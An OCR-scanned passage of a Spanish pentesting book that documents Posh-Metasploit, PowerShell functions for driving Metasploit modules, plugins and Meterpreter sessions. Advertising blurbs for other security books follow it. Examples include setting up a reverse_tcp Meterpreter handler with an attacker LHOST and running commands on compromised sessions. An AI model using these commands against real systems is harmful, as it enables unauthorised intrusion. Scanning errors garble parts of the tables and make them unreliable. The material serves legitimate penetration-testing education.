Esta función devuelve todas las opciones y detalles con 
los que está configurado un módulo. Se muestran tanto 
las opciones básicas como las avanzadas. Un ejemplo 
sería Ger- MSF ModuleOptions -Id <identificador sesión 
-Name windows/meterpreter/reverse_tcp -Type payload 
-Verbose 


Get-MSFModuleOptions 


Esta función enumera qué sesiones, por ejemplo de 
Meterpreter, ya abiertas en Metasploit son compatibles 
con el módulo de Post-Exploitation que se indica como 

argumento. Un ejemplo sería Get-MSFCompatibleSession 

-Id <identificador sesión? -Name "multi/general/ 
execute " 


Get- 


MSFPostCompatibleSession 


nan. a 
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Descripción 


Esta función permite ejecutar un módulo pasándole 
la configuración a través del parámetro Options. Un 

ej emplo sería Invoke-MSFModule -Id <identificador 
sesión> -Type exploit -Name “multi/handler” -Options @ 
{ “PAYLOAD” = "windows/meterpreter/reverse tep”; “LH 
OST"—"192.168.56.101"; "LPORT"—4444 E lore 


Tabla 4.04: Funciones de Module en Posh-Metasploit. 


Invoke-MSF Module 


Plugin 


Esta categoría o módulo de Posh-Mi ji i i 
sh-Metasploit permite gestionar e interactu i : j 
desarrollados para mejorar la experienci AÑ 


a de Metasploit durante un test de intrusión. 


Por ejemplo, se pueden utilizar plugins que integren herramientas como Nessus 
con el fin de aprovechar los resultados obtenidos en la fase de explotación. A contin 
las funciones que aporta el módulo: 


Nmap o Nexpose 
uación se detallan 


Descripción 


Esta función proporciona un listado de todos los plugins cargados 
en Metasploit. Un ejemplo sería Get-MSFLoadedPlugin -Id 
<identificador sesión> 
Esta función permite registrar un plugin y de este modo disponer 
de los comandos que el plugin aporta. Su comando equivalente 

Register-MSFPlugin en Metasploit sería load <plugin>. Un ejemplo seria Register- 
MSF Plugin -Id <identificador sesión? -Name nessus. y 
posteriormente para ver si el p/ugin se ha cargado correctamente 
se lanzaría Get-MSFLoadedPlugin -Id <identificador sesión? 


Get- MSFLoadedPlugin 


Esta función permite descargar o eliminar un plugin ya cargado. 
UnRegister-MSFPlugin Su comando equivalente en Metasplot sería unload «plugin. Un 
ejemplo sería UnRegister-MSFPlugin -Id < identificador sesión 

-Name nessus 


Tabla 4.05: Funciones de Plugin en Posh-Metasploit, 


Posh 


mi X lleva el nombre idéntico del framework. Permite la gestión de las sesiones con el servidor 
- ce o ^ Metasploit vía XMLRPC : desde la creación de dichas sesiones hasta la desconexión y 
minación. A continuación se describen las diferentes funciones que forman parte del módulo: 
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New-MSFServerSession 


Set-MSFAuthToken 


Get-MSFServerSession 


Descripción 


Genera una nueva sesión dado un MSFRPCD. Un ejemplo sería 
New-MSFServerSession -ComputerName 192.168.1.104 -Port 
55553 -Credentials (Get-Credential msf) 


Configura sobre una sesión existente un Authentication Token 


Esta función devuelve un listado de las sesiones que hay abiertas 
con el servidor remoto 


Esta función elimina una sesión existente en el servidor. La sesión 
debe indicarse a través del parámetro /d, por ejemplo Remove- 
MSFServerSession -Id 2 —Verbose 


Esta función devuelve información sobre la versión Core de una 
sesión de Metasploit 


Esta función devuelve información sobre el token de autenticación 
de una sesión 


Esta función genera un nuevo y permanente token de autenticación 
en Metasploit 


Esta función elimina un /oken de autenticación conocido, 
Restos MERARI indicándole a través del parámetro —7oken 


Esta función devuelve un listado de hilos que se ejecutan en el 
Get-MSFThread em 


Remove-MSFThread Esta función detiene el hilo en ejecución 


Get-PoshMSFersion Esta función devuelve la versión actual de Posh-Metasploit 


Tabla 4.06: Fimciones del módulo Posh-Metasploit en Posh-Metasploit. 


Remove-MSFServerSession 


Get-MSFCorelnfo 
Get-MSFAuthToken 


New-MSFAuthToken 


Session | 
Este módulo proporciona las funciones que permiten gestionar las sesiones, tras una explotación 
exitosa, que se tiene en Metasploit. La enumeración de sesiones o cómo interactuar con ellas son 
las funciones interesantes del módulo Session de Posh-Metasploit. A continuación se detallan las 
funciones que forman parte del módulo: 


Esta función devuelve un listado de las sesiones que se 
encuentran abiertas tras una explotación. Dentro de los 
valores que devuelve la función se encuentran algunos 
interesantes como SessionID, via exploit, session. host, 
via payload, platform o type entre otros. Un ejemplo 
sería Get-MSFSession -Id <identificador sesión? 


Get-MSFSession 


mEMM————————— —— Sail 
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Descripción 


Esta función permite escribir texto a través de la 
sesión de Meterpreter obtenida tras la explotación 
de una vulnerabilidad. Un ejemplo sería Write- 
MSF MeterpreterConsole -Index 0 -Sessionld «ID sesión 
Meterpreter> -Text "sysinfon" 


Esta función permite leer resultados obtenidos tras la 
escritura con Write-MSFMeterpreterConsole. Es decir. 
con una función se escribe a través de la sesión para 
ejecutar una orden y con la otra función se recupera la 
salida de lo escrito en consola. Un ejemplo sería Read- 
MSF MeterpreterConsole —Id <identificador sesión 
-Sessionld «ID sesión Meterpreter> 


Esta función devuelve un listado de módulos de tipo 
post que son compatibles con la sesión que el usuario 
tiene en la máquina comprometida. Un ejemplo sería 

Get-MSFSessionCompatPostModule -Id <identificador 

sesión? -Sessionld «1D sesión Meterpreter> 


Write-MSFMeterpreterConsole 


Read-MSFMeterpreterConsole 


Get- 


MSFSessionCompatPostModule 


Esta función ejecuta un comando a través de la consola 
sobre una sesión de Merterpreter. El comando debe ser 
propio de Meterpreter. Un ejemplo válido es /nvoke- 
MSF MMeterpreterCommand -Id <identificador sesión? 
-Sessionld «ID sesión Meterpreter> -Command "getuid" 


Invoke-MSF Meterpreter Command 


Esta función escribe un texto a través de una sesión 
de shell. Un ejemplo sería Write-MSFShellConsale 
-Id <identificador sesión? -Sessionld «ID sesión 
Meterpreter> -Text "ping -c 2 127.0.0.1 n” 


Write-MSFShellConsole 


Esta función permite leer la salida de los comandos 
ejecutados a través de Write-MSFShellConsole. Un 
ejemplo sería Read-MSFShellConsole -Id <identificador 
sesión -Sessionld «ID sesión Meterpreter> 
Esta función finaliza la sesión del payload que se indica a 
través del parámetro Sessionid 


Read- MSFShellConsole 


Remove-MSFSession 


Tabla 4.07: Funciones de Variables en Posh-Metasploit. 


A continuación se puede visualizar la ejecución de la función /moke-MSFMeterpreterCommand, 
con la que se consigue ejecutar un comando a través de una sesión de Meterpreter. La salida se 
muestra automáticamente, por lo que se puede decir que esta función automatiza el proceso de 
entrada y salida de datos, es decir, una sesión más interactiva. El ejemplo puede encontrarse en la 
documentación de Posh-Metasploit. 
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Fig. 4.11: Ejecución de comandos de Meterpreter a través de Invoke-MSF MeterpreterCommand. 


Variables 

Este módulo se encarga de interactuar con las variables, sobretodo globales, del Framework. 
Además, permite gestionar el almacenamiento de las configuraciones que el usuario haya hecho 
sobre el entorno, lo cual equipara a la ejecución del comando save en Metasploit. A continuación se 
describen las funciones del módulo: 


Esta función permite interactuar con el Datastore global de variables. 
Equivale a la utilización del comando setg <variable> «valor? en 
Metasploit. Un ejemplo sería Ser-MSFG lobalVariable -Id <identificador 
sesión> -Name LHOST -Value 192.168.56.101 


Set- 


MSFGlobalVariable 
Remove- 
MSFGlobalVariable 


Save-MSFConfig 


Esta función permite desasignar una variable global. Un ejemplo sería 
Remove-MSFGlobalVariable -Id «identificador sesión? -Name LHOST 


Esta función almacena en la carpeta personal del usuario la 
configuración de Metasploit en ese instante. Es decir, todas las variables 
asignadas en los módulos, todos los cambios realizados, el módulo 
activo, etcétera. Un ejemplo sería Save-MSFConfig -Id <identificador 
sesión? 


Tabla 4.08; Funciones de Variables en Posh-Metasploit. 
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Hacking y seguridad 
en comunicaciones móviles 
GSM/GPRS 


La información es clave en la preparación de un test de penetración. 
Sin ella no es posible determinar qué atacar ni cómo hacerlo. Y los 
buscadores se han convertido en herramientas fundamentales para 
la minería de datos y los procesos de inteligencia. Sin embargo, 
pese a que las técnicas de Google Hacking lleven años siendo 
utilizadas, quizá no hayan sido siempre bien tratadas ni transmitidas 
al püblico. Limitarse a emplear Google Dorks conocidos o a usar 
herramientas que automaticen esta tarea es, con respecto al uso de 
los buscadores, lo mismo que usar una herramienta como Nessus, 
o quizá el autopwn de Metasploit, y pensar que se está realizando 
un test de penetración. Por supuesto, estas herramientas son ütiles, 
pero se debe ir más allá, comprender los problemas encontrados, 
ser capaces de detectar otros nuevos... y combinar herramientas. 


Hoy en día no sufrimos las mismas amenazas (ni en cantidad ni 
en calidad) que hace algunos aiios. Y no sabemos cuáles serán los 
retos del mañana. Hoy el problema más grave es mitigar el impacto 
causado por las vulnerabilidades en el software y la complejidad 
de los programas. Y eso no se consigue con una guía “tradicional”, 
Y mucho menos si se perpetüan las recomendaciones “de toda 
la vida” como “cortafuegos”, “antivirus” y “sentido común”. 
¿Acaso no disponemos de otras armas mucho más potentes? No. 
Disponemos de las herramientas “tradicionales” muy mejoradas, 
cierto, pero también de otras tecnologías avanzadas para mitigar las 
amenazas. El problema es que no son tan conocidas ni simples. Por 
tanto es necesario leer el manual de instrucciones, entenderlas... y 


aprovecharlas... 


Más de 3.000 millones de usuarios en más de 200 países utilizamos 
diariamente las comunicaciones móviles GSM/GPRS/UMTS 
(2G/3G) para llevar a cabo conversaciones y transferencias de 
datos. Pero, ¿son seguras estas comunicaciones?. En los últimos 
años se han hecho públicos múltiples vulnerabilidades y ejemplos 
de ataques prácticos contra GSM/GPRS/UMTS que han puesto en 
evidencia que no podemos simplemente confiar en su seguridad.. 
Descubra en este libro cuáles son las vulnerabilidades y los 
ataques contra GSM/GPRS/UMTS (2G/3G) y el estado respecto a 
la nueva tecnología LTE, comprenda las técnicas y conocimientos 
que subyacen tras esos ataques y conozca qué puede hacer para 
proteger sus comunicaciones móviles. 
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La Administración Española lidera un encomiable esfuerzo hacia 
el Desarrollo de la Sociedad de la Información en España, así 
como en el uso óptimo de las tecnologías de la Información en pro 
de una prestación de servicios más eficiente hacia los ciudadanos. 
Aunque este tipo de contenidos no siempre son fáciles de tratar 
sin caer en un excesivo dogmatismo, sí es cierto que en el marco 
de la Ley 11/2007 del 22 de Junio, de acceso electrónico de los 
ciudadanos a los Servicios Públicos, se anunció la creación de los 
Esquemas Nacionales de Interoperabilidad y de Seguridad con la 
misión de garantizar un derecho ciudadano, lo que sin duda es un 
reto y una responsabilidad de primera magnitud. Este manual sirve 
para facilitar a los responsables de seguridad el cumplimiento de 
los aspectos tecnológicos derivados del cumplimiento del ENS. 


No es de extrañar que los programas contengan fallos, errores, 
que, bajo determinadas circunstancias los hagan funcionar de 
forma extraña. Que los conviertan en algo para lo que no estaban 
diseñados. Aquí es donde entran en juego los posibles atacantes. 
Pentesters, auditores,... y ciberdelincuentes. Para la organización, 
mejor que sea uno de los primeros que uno de los últimos. Pero para 
la aplicación, que no entra en valorar intenciones, no hay diferencia 
entre ellos. Simplemente. son usuarios que hablan un extraño 
idioma en que los errores se denominan “vulnerabilidades”. y una 
aplicación defectuosa puede terminar convirtiendose, por ejemplo, 
en una interfaz de usuario que le permita interactuar directamente 
con la base de datos. Y basta con un único error. 


Las redes de datos /P hace mucho tiempo que gobiernan nuestras 
sociedades. Empresas, gobiernos y sistemas de interacción 
social se basan en redes TCP/IP. Sin embargo, estas redes tienen 
vulnerabilidades que pueden ser aprovechadas por un atacante 
para robar contraseñas, capturar conversaciones de voz, mensajes 
de correo electrónico o información transmitida desde servidores. 
En este libro se analizan cómo funcionan los ataques de man in 
the middle en redes [Pv4 o IPv6, cómo por medio de estos ataques 
se puede crakear una conexión VPN PPTP, robar la conexión de 
un usuario al Active Directory o cómo suplantar identificadores 
en aplicaciones para conseguir perpetrar una intrusión además del 
ataque SLAAC, el funcionamiento de las técnicas ARP-Spoofing, 
Neighbor Spoofing en [Pv6, etcétera. 
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Hoy día es innegable el imparable crecimiento que han tenido las ¿Sabías que Steve Jobs le llevó en persona un ordenador Macintosh 
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Windows Server 2012 
para IT Pros 


Metasploit 


para Pentesters 


BWaRI 


2^ tdici 


nümero de smartphones, tablets, etcétera han aumentado de manera 
exponencial. Esto ha sido así, hasta tal punto que actualmente estos 
dispositivos se han posicionado como tecnologías de máxima 
prioridad para muchas empresas. 

Con este libro se pueden adquirir los conocimientos necesarios 
para desarrollar aplicaciones en ;OS, guiando al lector para que 
aprenda a utilizar las herramientas y técnicas básicas para iniciarse 
en el mundo iOS. Se pretende sentar unas bases, de manera que al 
finalizar la lectura, el lector pueda convertirse en desarrollador ¡OS 
y enfrentarse a proyectos de este sistema operativo por sí mismo. 


Microsoft Windows Server 2012 ha llegado con novedades cuyo 
objetivo es simplificar las, cada vez más, complejas tareas de 
los administradores y profesionales /7. En el presente libro 
se recogen la gran mayoría de dichas novedades entre las que 
destacan la versión 3.0 de Hyper-V, el servidor de virtualización 
de Microsoft, el almacenamiento con su nuevo sistema de archivos 
y sus propiedades, las mejoras y nuevas características de Active 
Directory, DNS y DHCP. las novedosas fórmulas de despliegue 
eficiente, la ampliación y mejora de la línea de comandos 
Microsoft Windows PowerShell, y como no, la seguridad, un pilar 
básico en la estructura de los productos Microsoft La idea del libro 
es presentar las novedades y ahondar en los conceptos principales. 


La seguridad de la información es uno de los mercados en auge en 
la Informática hoy en día. Los gobiernos y empresas valoran sus 
activos por lo que deben protegerlos de accesos ilícitos mediante 
el uso de auditorías que proporcionen un status de seguridad a 
nivel organizativo. El pentesting forma parte de las auditorías 
de seguridad y proporciona un conjunto de pruebas que valoren 
el estado de la seguridad de la organización en ciertas fases. 
Metasploit es una de las herramientas más utilizadas en procesos 
de pentesting ya que contempla distintas fases de un test de 
intrusión. Con el presente libro se pretende obtener una visión 
global de las fases en las que Metasploit puede ofrecer su potencia 
y flexibilidad al servicio del hacking ético. 
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Hacking y Seguridad 
VoIP 


algunas de las decisiones de diseño de este ordenador? ¿O que 
Xenix fue el sistema UNZX más usado en los 80s en ordenadores y 
que era propiedad de Microsoft? 

Estas son sólo algunas de las historias y anécdotas que encontrarás 
en este libro de Microhistorias. Una parte importante de las cuales 
tienen como protagonista a los miembros de Microsoft y de Apple. 
Historias de hackers, phreakers, programadores y diseñadores 
cuya constancia y sabiduría nos sirven de inspiración y de ejemplo 
para nuestros proyectos de hoy en día. 


Ángel Ríos, auditor de una empresa puntera en el sector de 
la seguridad informática se prepara para acudir a una cita con 
Yolanda, antigua compañera de clase de la que siempre ha estado 
enamorado. Sin embargo. ella no está interesada en iniciar una 
relación: sólo quiere que le ayude a descifrar un misterioso 
archivo. Ángel se ve envuelto en una intriga que complicará su 
vida y lo expondrá a un grave peligro. Únicamente contará con sus 
conocimientos de hacking y el apoyo de su amigo Marcos. 
Mezcla de novela negra y manual técnico, este libro aspira 
a entretener e informar a partes iguales sobre un mundo tan 
apasionante como es el de la seguridad informática. Técnicas de 
hacking web, sistemas y análisis forense, son algunos de los temas 
que se tratan con total rigor y excelentemente documentados, 


La evolución de VOIP ha sido considerable, siendo hoy día 
una alternativa muy utilizada como solución ünica de telefonía 
en muchísimas empresas. Gracias a la expansión de Internet y 
a las redes de alta velocidad, llegará un momento en el que las 
líneas telefónicas convencionales sean totalmente sustituidas por 
sistemas de VOIP, dado el ahorro económico no sólo en llamadas 
sino también en infraestructura. 

E] gran problema es la falta de concienciación en seguridad. Las 
empresas aprenden de los errores a base de pagar elevadas facturas 
y a causa de sufrir intrusiones en sus sistemas. 

Este libro muestra cómo hacer un test de penetración en un sistema 
de VOIP asi como las herramientas más utilizadas para atacarlo, 
repasando además los fallos de configuración más comunes. 
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¿Has pensado alguna vez por qué coño el informático tiene siempre 


Este libro trata sobre la securización de entornos Linux siguiendo 
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g y esa cara de orco? ¿Por qué siempre está enfadado”? ¿Por qué no se Hardening de servidores GNU/Linux el modelo de Defensa en Profundidad. Es decir, diferenciando la 
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Desarrollo de aplicaciones 
Android seguras 


Cifrado de las comunicaciones digitales 
De la cifra clásica al algoritmo RSA 


relaciona con la gente de la oficina? iieri ruri 


Yo te lo digo: por tu culpa. Por vuestra culpa. Por las burradas 
que hacéis. Porque no os podéis estar quietecitos, no... Porque os 
creéis que el informático tiene la solución para todo. 

Pasa, pasa, y entérate de qué pasa por la cabeza de Wardog. un 
administrador de sistemas renegado, con afán de venganza, con 
maldad y con mala hostia. 

Wardog y el mundo es el producto de años de exposición a lusers 
dotados de estupidez tóxica. de mala baba destilada y acidez de 
estómago. Y café en cantidades malsanas. 


Actualmente, el mundo de las aplicaciones móviles es uno de los 
sectores que más dinero mueve en el mercado de la informática. 
Tener conocimientos de programación en estas plataformas 
móviles es una garantía para poder encontrar empleo a día de hoy, 
“Desarrollo de aplicaciones Android seguras” pretende inculcar 
al lector una base sólida de conocimientos sobre programación 
en la plataforma móvil con mayor cuota de mercado del mundo: 
Android. Mediante un enfoque eminentemente práctico, el libro 
guiará al lector en el desarrollo de las funcionalidades más 
demandadas a la hora de desarrollar una aplicación móvil. Además 
se pretende educar al programador e introducirle en la utilización 
de técnicas de diseño que modelen aplicaciones seguras, en la parte 
de almacenamiento de datos y en la parte de comunicaciones. 


Este libro se dedica especialmente a dos paradigmas de la 
criptografía: la clásica y RSA. Ambos los trata a fondo con el 
ánimo de convertirse en uno de los documentos más completos en 
esta temática. Para conseguir este trabajo el texto presentado toma 
como referencia trabajo previo de los autores, complementándolo 
y orientándolo para hacer su lectura más asequible. 

El técnico o experto en seguridad tendrá especial interés por el 
sistema RSA, aunque le venga muy bien recordar sus inicios en 
la criptografía como texto de amena lectura y, por su parte, el 
lector no experto en estos temas criptológicos pero sí interesado, 
seguramente le atraiga inicialmente la criptografía clásica por su 
sencillez y sentido histórico. 


| Hacking de dispositivos ¡OS: 
- iPhone & iPad 


infraestructura en diferentes capas que deberán ser configuradas 
de forma adecuada, teniendo como principal objetivo la 
seguridad global que proporcionarán, Durante el transcurso de 
esta lectura se ofrecen bases teóricas, ejemplos de configuración 
y funcionamiento, además de buenas prácticas para tratar de 
mantener un entorno lo más seguro posible. Sin duda, los entornos 
basados en Linux ofrecen una gran flexibilidad y opciones, por lo 
que se ha optado por trabajar con las tecnologías más comunes y 
utilizadas. En definitiva, este libro se recomienda a todos aquellos 
que deseen reforzar conceptos, así como para los que necesiten una 
base desde la que partir a la hora de securizar un entorno Linux. 


A día de hoy se han vendido más de 500 millones de dispositivos 
iOS y aunque la seguridad del sistema ha mejorado con cada 
versión todavía se pueden encontrar vulnerabilidades a explotar 
Las auditorías de seguridad en empresas cada vez se encuentran con 
más dispositivos ¡OS entre sus objetivos, ya que los empleados los 
utilizan en sus puestos de trabajo, lo que hace que haya que pensar 
en ellos como posibles riesgos de seguridad. En este libro se han 
juntado un nutrido grupo de expertos en seguridad en la materia 
para recopilar en un texto, todas las formas de atacar un terminal 
iPhone o iPad de un usuario detereminado. Tras leer este libro, si 
un determinado usuario tiene un ¿Phone o un iPad, seguro que al 
lector se le ocurren muchas formas de conseguir la información 
que en él se guarde o de controlar lo que con él se hace. 


El exploiting es el arte de convertir una vulnerabilidad o brecha 
de seguridad en una entrada real hacia un sistema ajeno. Cuando 
cientos de noticias en la red hablan sobre “una posible ejecución 
de código arbitrario”, el exploiter es aquella persona capaz de 
desarrollar todos los detalles técnicos y complejos elementos 
que hacen realidad dicha afirmación. El objetivo es provocar, 
a través de un fallo de programación, que una aplicación haga 
cosas para las que inicialmente no estaba diseñada, pudiendo 
tomar así posterior control sobre un sistema. Desde la perspectiva 
de un hacker ético, este libro le brinda todas las habilidades 
necesarias para adentrarse en el mundo del exploiting y hacking 
de aplicaciones en el sistema operativo Linux. Conviértase en un 
ninja de la seguridad, aprenda el Kung Fu de los hackers. 
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ETICA PARA LA PEALIZACUÓN DE UN PONTESTING. 
Pabio González Pérez 


La herramienta FOCA es una utilidad pensada por pentesters que hacen 
pentesting. Esto hace que la herramienta esté llena de opciones que te 
serán de extremada utilidad si vas a necesitar hacer una auditoría de 
seguridad a un sitio web o a la red de una empresa. FOCA está basada en 
la recolección de información de fuentes abiertas OSINT, y en esta última 
versión se ponen a disposición püblica todos los plugins y funciones que 
tenía la versión PRO. 


Además, en esta versión, es posible ampliar la funcionalidad de la 
herrmienta y extender las habilidades de FOCA mediante la creación de 
plugins personalizados. 


Las técnicas esteganográficas se inventaron hace miles de años, en la 
antigua China ya se empleaban para enviar mensajes ocultos entre 
personas, Posteriormente. ya en la era de la Guerra Fría, vinieron los 
micropuntos. 


Las técnicas han ido evolucionando hasta llegar a nuestros días, en los 
que la tecnología digital ha hecho cambiar radicalmente todas estas 
técnicas y utilizar los contenidos digitales para ocultar los mensajes. 
La primera ocultación se basó en el cambio del último bit, pero 
rápidamente se desarrollaron técnicas novedosas que descubrian este 
tipo de comunicación, lo que las inutilizó. Lo que provocó dedicar 
más esfuerzos a desarrollar métodos que utilizaran operaciones y 
transformadas matemáticas sobre los contenidos digitales que se utilizan 
como cobertura de los mensajes 


El mundo digital y el mundo físico están más unidos cada día. 
Las organizaciones realizan más gestiones de manera electrónica 
y cada día más amenazas ponen en peligro los activos de éstas. El 
mundo está interconectado, y por esta razón disciplinas como el 
hacking ético se hacen cada vez más necesarias para comprobar 
que la seguridad de los activos de una organización es la apropiada. 
El hacking ético es el arte que permite llevar a cabo acciones 
maliciosas envueltas en la ética profesional de un hacker que ha 
sido contratado con el fin de encontrar los agujeros de seguridad 
de los sistemas de una organización. En el presente libro puedes 
encontrar procedimientos, procesos, vectores de ataque, técnicas 
de hacking, teoría y práctica de este arte. 
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En este libro no solamente vas a encontrar contenido relacionado 
con las librerías y herramientas disponibles en Python para 
ejecutar actividades de pentesting, sino que también se habla sobre 
conceptos y técnicas de hacking en entornos de red, elevación 
de privilegios en sistemas Windows y Linux. herramientas 
para análisis forense, técnicas para recolección de información. 
técnicas y herramientas para la evasión de antivirus e incluso. 
uso y configuración avanzada de redes anónimas tales como 
I2P y TOR. Es un libro escrito especialmente para profesionales 
y entusiastas de la seguridad informática que se sienten a gusto 
programando y afinando sus conocimientos. Es una guía para 
personas que les gusta saber cómo funcionan las cosas y que se 
encuentran en un proceso continuo de aprendizaje. 


Python es un lenguaje de programación muy popular entre 
pentesters y entusiastas de la seguridad informática, pero también 
entre ciberdelincuentes que pretenden detectar y explota: 
vulnerabilidades durante todo el tiempo que sea posible. En 
este documento encontraras una guia para estudiar algunas de 
las tecnicas utilizadas por los atacantes en Internet para explotar 
vulnerabilidades y cubrir sus rastros. El enfoque de este libro 
es completamente tecnico y los conceptos teoricos se apoyan 
con pruebas de concepto utilizando Python. Los conocimientos 
necesarios para comprometer un sistema son cada vez mayores 
y aprender sobre seguridad informática es un reto que muchos 
ciberdelincuentes están afrontando en su día a día. 


No, esto no es un libro de hacking pero sí es un comic basado 
en el libro de Hacker Épico donde podrás vivir una aventura 
inolvidable. Sujetos investigados: Ángel Ríos, auditor seguridad 
informática. y Marcos, cómplice y amigo. Hechos: Tratamiento 
e investigación desautorizada de archivos de carácter altamente 
confidencial. Declaraciones: Durante el pasado fin de semana, a 
punto de terminar un proyecto muy importante, tuve una cita con 
Yolanda, antigua compañera de clase: me ha pedido que descifre 
un misterioso archivo, ella me gusta, no supe decirle que no. Ahora 
no sé qué está pasando, desde que descifré el archivo nuestras 
vidas están en peligro, debe de haber una trama encubierta de 
mentiras detrás de todo esto y solo dependo de mis conocimientos 
de hacking para hacer püblica la verdad. 


